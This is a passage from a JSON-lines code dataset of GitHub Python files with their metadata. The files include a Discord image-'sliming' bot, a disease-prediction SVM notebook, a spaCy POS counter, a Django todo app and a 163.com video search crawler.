"Maximilian1021/GameEnergyInfraV2", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 11, "usage_type": "name"}, {"api_name": "discord.ext.commands.when_mentioned_or", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.Intents.all", "line_number": 11, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 11, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "discord.Activity", "line_number": 27, "usage_type": "call"}, {"api_name": "discord.ActivityType", "line_number": 27, "usage_type": "attribute"}, {"api_name": "discord.Status", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 65, "usage_type": "call"}, {"api_name": "discord.Colour.red", "line_number": 65, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 65, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Context", "line_number": 73, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 73, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Colour.red", "line_number": 76, "usage_type": "call"}, {"api_name": "discord.Colour", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 84, "usage_type": "call"}]} +{"seq_id": "35514484176", "text": "import logging\nlogger = logging.getLogger(\"pythran\")\n\n# Initialize logging\ntry:\n # Set a nice colored output\n from colorlog import ColoredFormatter\n formatter = ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(blue)s%(message)s\",\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'red',\n }\n )\n stream = logging.StreamHandler()\n stream.setFormatter(formatter)\n logger.addHandler(stream)\nexcept ImportError:\n # No color available, use default config\n logging.basicConfig(format='%(levelname)s: %(message)s')\n logger.warn(\"Disabling color, you really want to install colorlog.\")\n", "repo_name": "genekh/python", "sub_path": "compilers/pythran/pythran/log.py", "file_name": "log.py", "file_ext": "py", "file_size_in_byte": 756, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 2, "usage_type": "call"}, {"api_name": "colorlog.ColoredFormatter", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "24789782359", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport sklearn\n\n\n# In[2]:\n\n\ndf = pd.read_csv('dataset.csv')\ndf.head()\n\n\n# In[3]:\n\n\ncols = df.columns\ndata = df[cols].values.flatten()\n\n\n# In[4]:\n\n\ns = pd.Series(data)\ns = s.str.strip()\ns = s.values.reshape(df.shape)\n\n\n# In[5]:\n\n\ndf = pd.DataFrame(s, columns=df.columns)\ndf = df.fillna(0)\n\n\n# In[6]:\n\n\ndf1 = pd.read_csv('Symptom-severity.csv')\nvals = df.values\n\n\n# In[7]:\n\n\nsymptoms = df1['Symptom'].unique()\n\n\n# In[8]:\n\n\nfor i in range(len(symptoms)):\n vals[vals==symptoms[i]] = df1[df1['Symptom'] == symptoms[i]]['weight'].values[0]\n\n\n# In[9]:\n\n\nd = pd.DataFrame(vals, columns=cols)\nd.head(100)\n\n\n# In[10]:\n\n\nimport joblib\nimport streamlit\n\n\n# In[11]:\n\n\nd = d.replace('dischromic _patches', 0)\nd = d.replace('spotting_ urination', 0)\ndf = d.replace('foul_smell_of urine', 0)\ndf.head()\n\n\n# In[12]:\n\n\ndata = df.iloc[:, 1:].values\nlabels = df['Disease'].values\n\n\n# In[13]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[14]:\n\n\nx_train, x_test, y_train, y_test = train_test_split(data, labels, shuffle=True, train_size=0.85)\n\n\n# In[15]:\n\n\nprint(x_train.shape, x_test.shape, y_train.shape, y_test.shape)\n\n\n# In[16]:\n\n\nfrom sklearn.svm import SVC\n\n\n# In[17]:\n\n\nmodel = SVC()\nmodel.fit(x_train, y_train)\n\n\n# In[18]:\n\n\npreds = model.predict(x_test)\n\n\n# In[28]:\n\n\npreds\n\n\n# In[19]:\n\n\nfrom sklearn.metrics import f1_score, accuracy_score, confusion_matrix\nimport seaborn as sns\n\n\n# In[ ]:\n\n\n\n\n\n# In[20]:\n\n\nconf_mat = confusion_matrix(y_test, preds)\ndf_cm = pd.DataFrame(conf_mat, index=df['Disease'].unique(), columns=df['Disease'].unique())\nprint('F1-score% =', f1_score(y_test, preds, average='macro')*100, '|', 'Accuracy% =', accuracy_score(y_test, preds)*100)\nsns.heatmap(df_cm)\n\n\n# In[21]:\n\n\nmodel.score(data, labels)\n\n\n# In[22]:\n\n\njoblib.dump(model, 'svc_model.pkl')\n\n\n# In[23]:\n\n\ndf.head()\n\n\n# In[25]:\n\n\ndf.head(50)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "siranjeevi21/Disease-prediction", "sub_path": "model.py.py", "file_name": "model.py.py", "file_ext": "py", "file_size_in_byte": 1978, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 37, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 151, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 152, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 152, "usage_type": "call"}, {"api_name": "seaborn.heatmap", "line_number": 153, "usage_type": "call"}, {"api_name": "joblib.dump", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "15755756295", "text": "\"\"\" A script for counting POS tag usage by each candidate.\n \"\"\"\n\n# Imports and initiations\nimport spacy, os, collections\nnlp = spacy.load('en_core_web_lg')\n\nfor filename in os.listdir('results'):\n if filename.endswith(\".txt\"):\n tag_dict = collections.defaultdict(int)\n pos_dict = collections.defaultdict(int)\n\n # Load files\n fileText = open(\"results/\" + str(filename)).read()\n doc = nlp(fileText)\n\n # Count POS tags, both granularities\n for token in doc:\n tag_dict[token.tag_] += 1\n pos_dict[token.pos_] += 1\n\n with open('results/pos/' + str(filename), 'w') as f:\n print(\"Coarse-Grained Tags\", file=f)\n print(\"Tag\\tCount\\n\", file=f)\n for key, value in pos_dict.items():\n print(str(key) + \"\\t\" + str(value), file=f)\n\n print(\"\\n\\n\\nFine-Grained Tags\", file=f)\n print(\"Tag\\tCount\\n\", file=f)\n for key, value in tag_dict.items():\n print(str(key) + \"\\t\" + str(value), file=f)\n f.close()\n else:\n pass\n", "repo_name": "jradishness/pdc", "sub_path": "posProcessing.py", "file_name": "posProcessing.py", "file_ext": "py", "file_size_in_byte": 1092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "spacy.load", "line_number": 6, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "19142877912", "text": "# slimebot.py\nimport os\nimport time\nimport json\nimport discord\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\nfrom imagetest import slime_image, valid_image_url\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\nADMIN_ID = os.getenv('ADMIN_ID')\n\nbot = commands.Bot(command_prefix='sb ')\n\nslime_word_dict = {}\nblack_list_dict = {}\n\n\ndef write_slime_dict_to_file():\n print(f\"this method was called\")\n with open('slimelist.json', 'w') as slime_list_file_descriptor:\n global slime_word_dict\n json.dump(slime_word_dict, slime_list_file_descriptor)\n\n\ndef write_blacklist_dict_to_file():\n with open('blacklist.json', 'w') as black_list_file_descriptor:\n global black_list_dict\n json.dump(black_list_dict, black_list_file_descriptor)\n\n\nasync def send_image(channel, slimed_image):\n try:\n await channel.send(\"Sure thing\", file=discord.File(slimed_image))\n except discord.errors.HTTPException as e: # mostly concerned about 413 payload too large\n await channel.send(\"Sorry, the finished image is too large. If only bots could have\"\n \" Nitro.\", file=discord.File(\"./images/src/SlimeSorry.png\"))\n\n\n@bot.event\nasync def on_ready():\n for guild in bot.guilds:\n if guild.name == GUILD:\n break\n\n with open('slimelist.json') as slime_list_file_descriptor, open(\n 'blacklist.json') as black_list_file_descriptor:\n global slime_word_dict\n global black_list_dict\n slime_word_dict = json.load(slime_list_file_descriptor)\n black_list_dict = json.load(black_list_file_descriptor)\n\n print(\n f'{bot.user} is connected to the following guild:\\n'\n f'{guild.name}(id: {guild.id})'\n )\n members = '\\n - '.join([member.name for member in guild.members])\n print(f'Guild Members:\\n - {members}')\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n if message.author == bot.user:\n return\n\n if message.content.split(' ')[0] == \"sb\": # does nothing if the user enters a slimebot command\n return\n\n if isinstance(message.channel, discord.DMChannel):\n return\n\n changed_list = False\n word_list = message.content.split(' ')\n for word in word_list:\n if word in slime_word_dict:\n changed_list = True\n original_submitter = bot.get_user(slime_word_dict[word][\"id\"]).mention\n submission_time = time.ctime(slime_word_dict[word][\"time\"])\n response_message = (f\"{message.author.mention} said the slimeword: {word}!\\n\"\n f\" it was added by {original_submitter}\"\n f\" on {submission_time}\")\n slime_word_dict.__delitem__(word)\n black_list_dict[word] = time.time()\n slime_image(f\"{message.author.avatar_url}\")\n await send_image(message.channel, \"./images/result.webp\")\n if changed_list:\n write_slime_dict_to_file()\n\n\n@bot.command(name='addwords', help='dm this bot a list of words in the format: \"addwords word1 word2 word3\"')\nasync def add_words(ctx):\n if isinstance(ctx.channel, discord.DMChannel):\n word_list = ctx.message.content.split(' ')\n del word_list[0:2] # removes the command words\n for word in word_list:\n if word not in slime_word_dict and word not in black_list_dict:\n submission_info = {\"id\": ctx.author.id, \"time\": time.time()}\n slime_word_dict[word] = submission_info\n else:\n word_list.remove(word)\n await ctx.send(f\" You added the following words: {word_list}\")\n write_slime_dict_to_file()\n else:\n await ctx.send(f\"dm this bot a list of words in the format: addwords word1 word2 word3\")\n\n\n@bot.command(name='blacklistwords', help='dm this bot a list of words to blacklist, this words will be removed from '\n 'the slime list pool and not addable again: \"blacklistwords word1, word2, '\n 'word3\"')\nasync def blacklist_words(ctx):\n if isinstance(ctx.channel, discord.DMChannel):\n word_list = ctx.message.content.split(' ')\n del word_list[0:2] # removes the command words\n for word in word_list:\n if word not in black_list_dict:\n submission_info = {\"id\": ctx.author.id, \"time\": time.time()}\n black_list_dict[word] = submission_info\n if word in slime_word_dict:\n slime_word_dict.__delitem__(word)\n else:\n word_list.remove(word)\n await ctx.send(f\" You added the following words to the blacklist: {word_list}\")\n write_blacklist_dict_to_file()\n else:\n await ctx.send(f\"dm this bot a list of words in the format: blacklistwords word1 word2 word3\")\n\n\n@bot.command(name='slime', help='send me an image or a link to an image and I will silime it, to get slimed say '\n '\\\"slime me\\\"')\nasync def slime_this(ctx, *args):\n if args:\n if args[0] == \"me\":\n slimed_image = slime_image(f\"{ctx.author.avatar_url}\")\n await send_image(ctx.channel, slimed_image)\n return\n\n for role in ctx.message.role_mentions:\n for user in role.members:\n slimed_image = slime_image(f\"{user.avatar_url}\")\n await send_image(ctx.channel, slimed_image)\n\n for user in ctx.message.mentions:\n slimed_image = slime_image(f\"{user.avatar_url}\")\n await send_image(ctx.channel, slimed_image)\n\n for arg in args:\n arg = str(arg).strip('<>')\n if valid_image_url(arg):\n slimed_image = slime_image(arg)\n await send_image(ctx.channel, slimed_image)\n\n for attachment in ctx.message.attachments:\n attachment_url = attachment.url\n print(attachment_url)\n if valid_image_url(attachment_url):\n slimed_image = slime_image(attachment_url)\n await send_image(ctx.channel, slimed_image)\n\n\n@bot.command(name='fix', help='If slime bot is not working the way you would expect, send the dev a description '\n 'of the problem so that they can fix it, please include as much relevant'\n 'information as you can. You may be contacted for more information by the dev.'\n ' Note that slimebot is running on an old computer, and may be'\n 'very slow at times. This is in itself not considered a reportable problem')\nasync def fix_me(ctx, *args):\n if args:\n author = ctx.message.author.mention\n message_to_admin = f\"{author} has reported the following problem: {ctx.message.content}\"\n try:\n admin_id_int = int(ADMIN_ID)\n except ValueError:\n await ctx.channel.send(\"If you see this message it means even the error reporting is broken!!\")\n admin = bot.get_user(admin_id_int)\n await admin.send(message_to_admin)\n attachment_message = \"the following attachments were included: \"\n for attachment in ctx.message.attachments:\n await admin.send(f\"{attachment_message}{attachment.url}\")\n return\n await ctx.channel.send(\"You need to add a description of the problem!\")\n\n\nbot.run(TOKEN)\n\n# add procedurly generated slime\n# add progressive sliming\n# add animated slimeq\n# add animated slime to gifs\n", "repo_name": "CharlesMogan/SlimeBot", "sub_path": "slimebot2/slimebot.py", "file_name": "slimebot.py", "file_ext": "py", "file_size_in_byte": 7503, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands.Bot", "line_number": 15, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 15, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 25, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 36, "usage_type": "call"}, {"api_name": "discord.errors", "line_number": 37, "usage_type": "attribute"}, {"api_name": "discord.File", "line_number": 39, "usage_type": "call"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 53, "usage_type": "call"}, {"api_name": "discord.DMChannel", "line_number": 72, "usage_type": "attribute"}, {"api_name": "time.ctime", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 87, "usage_type": "call"}, {"api_name": "discord.DMChannel", "line_number": 95, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "discord.DMChannel", "line_number": 114, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 119, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 136, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 142, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 146, "usage_type": "call"}, {"api_name": "imagetest.valid_image_url", "line_number": 151, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 152, "usage_type": "call"}, {"api_name": "imagetest.valid_image_url", "line_number": 158, "usage_type": "call"}, {"api_name": "imagetest.slime_image", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "9779442479", "text": "## ----------------------------------------\n## Test de stockage de fichier dans mongodb\n## ----------------------------------------\n\nfrom pymongo import MongoClient, collection\nimport datetime\n\nSERVER='localhost'\nPORT=27017\n\ndef log(msg=\"\"):\n\t\"\"\"\n\tPetite routine de log\n\t\"\"\"\n\td = datetime.datetime.now()\n\tts = d.strftime(\"%j %X %f\")\n\tprint(\"%s : %s\" % (ts, msg) )\n\nclass Document(object):\n\t\"\"\"\n\tLa classe de base : Document\n\t\"\"\"\n\tdef __init__(self):\n\t\tself.name = \"\"\n\t\tself.titre = \"\"\n\t\tself.description = \"\"\n\t\tself.version = \"\"\n\nclass DB(object):\n\t\"\"\"\n\tLa classe DB Database \n\t\"\"\"\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.db_cli = MongoClient(SERVER, PORT)\n\t\t## Creation Base de donnée\n\t\tself.db = self.db_cli[name]\n\t\ttry:\n\t\t\tself.doc = self.db['DOC']\n\t\t\tlog(\"Modele cree ...\")\n\t\texcept:\n\t\t\tself.doc = self.create_modele()\n\t\t\tlog(\"Creation du modele ...\")\n\n\tdef __str__(self):\n\t\treturn \"DB:%s %s\" % (self.name, self.db.collection_names())\n\n\tdef create_Doc(self, doc):\n\t\t\"\"\"\n\t\tcreation d'un document\n\t\t\"\"\"\n\t\tpass\n\n\tdef create_modele(self):\n\t\td = { 'nom':'root', 'meta':{\n\t\t\t\t\t\t\t\t\t'type':'DIR'\t\n\t\t\t\t\t\t\t\t\t}\n\t\t\t}\n\t\tself.db.DOC.insert(d)\n\t\treturn self.db.DOC\n\n\tdef purge(self):\n\t\tself.db.DOC.remove()\n\n\tdef close(self):\n\t\tself.db_cli.close()\n\n\nif __name__ == '__main__':\n\tD = DB('TEST')\n\td1 = { 'nom':'fichier1', 'meta_type':'FIC', 'FIC_TYPE':'TXT' }\n\td2 = { 'nom':'fichier2', 'meta_type':'FIC', 'FIC_TYPE':'TXT' }\n\tD.db.DOC.insert(d1)\n\tD.db.DOC.insert(d2)\n\tprint (\"Database : %s \" % D)\n\tfor doc in D.db.DOC.find():\n\t\tprint( \"doc : \", doc )\n\tD.purge()\n\tD.close()\n\n", "repo_name": "chrislyon/chris-p32-svged", "sub_path": "vsged/DB.py", "file_name": "DB.py", "file_ext": "py", "file_size_in_byte": 1579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "34695887696", "text": "#Reads a textfile with random numbers and plots it\r\n\r\n#imports packages\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#open the random numbers file\r\nfile = open(\"random_numbers.txt\")\r\n\r\n\r\n#reads the lines\r\nline = file.readlines()\r\n\r\n#makes an array of all the numbers to plot them\r\ni=0\r\nx=[]\r\nfor i in range(0,len(line)):\r\n x.append(float(line[i]))\r\n# an array of random numbers using our Random class\r\nfile.close()\r\nprint(x)\r\n\r\n#plots the histogram\r\nplt.hist(x,bins= 25) \r\nplt.xlabel('x')\r\nplt.ylabel('Probability')\r\nplt.title('Uniform random number')\r\nplt.grid(True)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n", "repo_name": "Raxxak/PHSX815_Week1", "sub_path": "Random_reader.py", "file_name": "Random_reader.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.hist", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "40744809889", "text": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom .models import Tasks\n\n\n# to display all task listing\ndef index(request):\n tasks = Tasks.objects.all()\n context = {\n 'tasks': tasks\n }\n return render(request, './SimpleTodo/task_listing.html', context)\n\n\n# to add task\ndef add_task(request):\n if request.method == \"POST\":\n new_task = request.POST['newTask']\n tasks = Tasks(task_title=new_task)\n tasks.save()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n\n# to edit task\ndef edit_task(request, task_id):\n task = get_object_or_404(Tasks, pk=task_id)\n context = {\n 'task': task\n }\n return render(request, './SimpleTodo/edit_task.html', context)\n\n\n# save the edit changes\ndef save_edit_task(request, task_id):\n if request.method == \"POST\":\n tasks = get_object_or_404(Tasks, pk=task_id)\n tasks.task_title = request.POST['newTaskTitle']\n tasks.save()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n\n# delete task\ndef delete_task(request, task_id):\n tasks = get_object_or_404(Tasks, pk=task_id)\n tasks.delete()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n\n# change the status of the task('completed' or 'pending')\ndef update_task_status(request, task_id):\n tasks = get_object_or_404(Tasks, pk=task_id)\n if request.method == \"GET\":\n if tasks.task_status:\n tasks.task_status = False\n else:\n tasks.task_status = True\n tasks.save()\n return HttpResponseRedirect(reverse('SimpleTodo:index'))\n\n", "repo_name": "abhi1263/learningDjango", "sub_path": "src/SimpleTodo/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Tasks.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "models.Tasks.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "models.Tasks", "line_number": 9, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 20, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 22, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 45, "usage_type": "argument"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Tasks", "line_number": 52, "usage_type": "argument"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 59, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "7980650342", "text": "# -*- coding: utf-8 -*-\n################################################################################################################\n# @file: one63query.py\n# @author: HeDian\n# @date: 2016/12/22\n# @version: Ver0.0.0.100\n# @note: \n################################################################################################################\nfrom configuration.constant import SPIDER_S2_WEBSITE_VIDEO\nfrom lxml import etree\nimport math\n\nfrom configuration.environment.configure import SpiderConfigure\nfrom utility.common import Common\nfrom utility.regexutil import RegexUtility\nfrom utility.xpathutil import XPathUtility\nfrom website.common.s2query import SiteS2Query\nfrom log.spiderlog import Logger\nfrom utility.timeutility import TimeUtility\nimport datetime\n\n\n################################################################################################################\n# @class:One63S2Query\n# @author:HeDian\n# @date:2016/12/22\n# @note:\n################################################################################################################\nclass One63S2Query(SiteS2Query):\n QUERY_TEMPLATE = 'http://so.v.163.com/search/000-{period}-0000-1-{page}-{order}-{key}/'\n DEFAULT_PAGE_SIZE = 20\n S2QUERY_FIRST_PAGE = 'S2QUERY_FIRST_PAGE'\n S2QUERY_EACH_PAGE = 'S2QUERY_EACH_PAGE'\n WEEKLY = '2'\n MONTHLY = '3'\n ALL = '0'\n ORDER = '2' #按照发布时间排序\n\n\n ################################################################################################################\n # @functions:__init__\n # @param: none\n # @return:none\n # @note:One63S2Query,初始化内部变量\n ################################################################################################################\n def __init__(self):\n # 使用该URL识别回传S2查询结果的类,推荐使用主站URL\n SiteS2Query.__init__(self)\n self.fakeoriginalurl = 'http://v.163.com/'\n self.r = RegexUtility()\n\n ################################################################################################################\n # @functions:getsearchresult\n # @params:输入参数\n # @return:none\n # @note:得到传入的检索结果页面的所有\n ################################################################################################################\n def getsearchresult(self, params):\n info = params.customized['query']\n\n xpath = XPathUtility(html=params.content)\n hrefs = xpath.xpath('//li/h3/a/@href')\n titles = xpath.getlist('//li/h3/a')\n pubtimes = xpath.xpath('//li/p')\n\n today = datetime.datetime.strptime(TimeUtility.getcurrentdate(), TimeUtility.DATE_FORMAT_DEFAULT).date()\n\n urllist = []\n for index in range(0, len(titles), 1):\n # 标题中包含指定要查询的关键字\n # if titles[index].find(info) > -1:\n if Common.checktitle(info, titles[index]):\n pubtimestr = TimeUtility.getuniformdate(pubtimes[index].text)\n pubtime = datetime.datetime.strptime(pubtimestr, TimeUtility.DATE_FORMAT_DEFAULT).date()\n inteveral = today - pubtime\n # 时间在指定周期内\n if inteveral.days <= self.querylastdays:\n urllist.append(hrefs[index])\n else:\n # 因为是按照时间排序的,第一条时间不满足检索周期的话,后面所有的都不满足。\n break\n\n if len(urllist) > 0:\n self.__storeurllist__(urllist, SPIDER_S2_WEBSITE_VIDEO)\n ################################################################################################################\n # @functions:query\n # @info: query condition\n # @return:none\n # @note:SiteS2Query,S2 query\n ################################################################################################################\n def query(self, info):\n keyvalue = Common.urlenc(info)\n\n # step1: 根据key, 拼出下面的url\n if self.querylastdays <= 7:\n periodvalue = self.WEEKLY\n elif self.querylastdays <= 30:\n periodvalue = self.MONTHLY\n else:\n periodvalue = self.ALL\n urls = [One63S2Query.QUERY_TEMPLATE.format(period = periodvalue, page = 1, order = self.ORDER, key = keyvalue)]\n Logger.getlogging().debug(urls[0])\n self.__storeqeuryurllist__(urls, self.S2QUERY_FIRST_PAGE, {'query':info, 'period':periodvalue})\n\n ################################################################################################################\n # @functions:process\n # @params: see WebSite.process\n # @return:none\n # @note:SiteS2Query, process S2 query result,一般为查询到的URL列表\n ################################################################################################################\n def process(self, params):\n if params.step == One63S2Query.S2QUERY_FIRST_PAGE:\n #Step2: 根据返回内容,通过xpath: //*[@data-search-page=\"item\"] 得到最大page数、(返回数组的倒数第二位)\n info = params.customized['query']\n periodvalue = params.customized['period']\n keyvalue = Common.urlenc(info)\n\n # 得到检索结果总件数\n html = etree.HTML(params.content)\n nodes = html.xpath('//*[contains(@class,\"result\")]/span')\n # 获取不到,则返回\n if len(nodes) == 0:\n return\n\n # 获取最后一页的页数\n try:\n page_count = int(math.ceil(float(nodes[0].text) / self.DEFAULT_PAGE_SIZE))\n except:\n page_count = 1\n\n # 获取当前页的检索结果\n self.getsearchresult(params)\n\n # 根据上面的page_count数,拼出除了首页之外的所有的搜索结果url\n querylist = []\n for page in range(2, page_count + 1, 1):\n url = One63S2Query.QUERY_TEMPLATE.format(period = periodvalue, page = page, order = self.ORDER, key = keyvalue)\n Logger.getlogging().debug(url)\n querylist.append(url)\n self.__storeqeuryurllist__(querylist, One63S2Query.S2QUERY_EACH_PAGE, {'query':info})\n\n elif params.step == One63S2Query.S2QUERY_EACH_PAGE:\n # Step3: 根据Step2的url,通过xpath获取搜索结果的url,把url写入文件\n self.getsearchresult(params)", "repo_name": "ErBingBing/django-tonado-crawler", "sub_path": "ZG-PhaseFour/code/website/onesixthree/one63query.py", "file_name": "one63query.py", "file_ext": "py", "file_size_in_byte": 6559, "program_lang": "python", "lang": "de", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "website.common.s2query.SiteS2Query", "line_number": 29, "usage_type": "name"}, {"api_name": "website.common.s2query.SiteS2Query.__init__", "line_number": 48, "usage_type": "call"}, {"api_name": "website.common.s2query.SiteS2Query", "line_number": 48, "usage_type": "name"}, {"api_name": "utility.regexutil.RegexUtility", "line_number": 50, "usage_type": "call"}, {"api_name": "utility.xpathutil.XPathUtility", "line_number": 61, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utility.timeutility.TimeUtility.getcurrentdate", "line_number": 66, "usage_type": "call"}, {"api_name": "utility.timeutility.TimeUtility", "line_number": 66, "usage_type": "name"}, {"api_name": "utility.timeutility.TimeUtility.DATE_FORMAT_DEFAULT", "line_number": 66, "usage_type": 